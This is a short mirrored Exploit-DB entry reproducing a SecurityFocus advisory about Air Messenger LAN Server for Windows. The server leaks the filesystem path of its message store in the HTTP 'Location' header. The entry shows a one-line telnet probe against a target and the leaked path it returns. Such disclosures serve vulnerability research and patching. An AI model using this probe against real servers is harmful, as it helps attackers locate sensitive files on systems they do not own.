exploit-db-mirror/exploits/windows/remote/20934.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

10 lines
No EOL
456 B
Text

source: https://www.securityfocus.com/bid/2881/info
Air Messenger LAN Server for Microsoft Windows allows users to exchange phone, pager and email messages through a Web gateway.
The path to sensitive files used by AMLServer can be easily obtained by any remote user, simply by examining the webserver's http-header 'Location' field.
$ telnet target 80|grep Location
Location: http://C:\PROGRA~1\ISS\AIRMES~1\Messages
Connection closed by foreign host.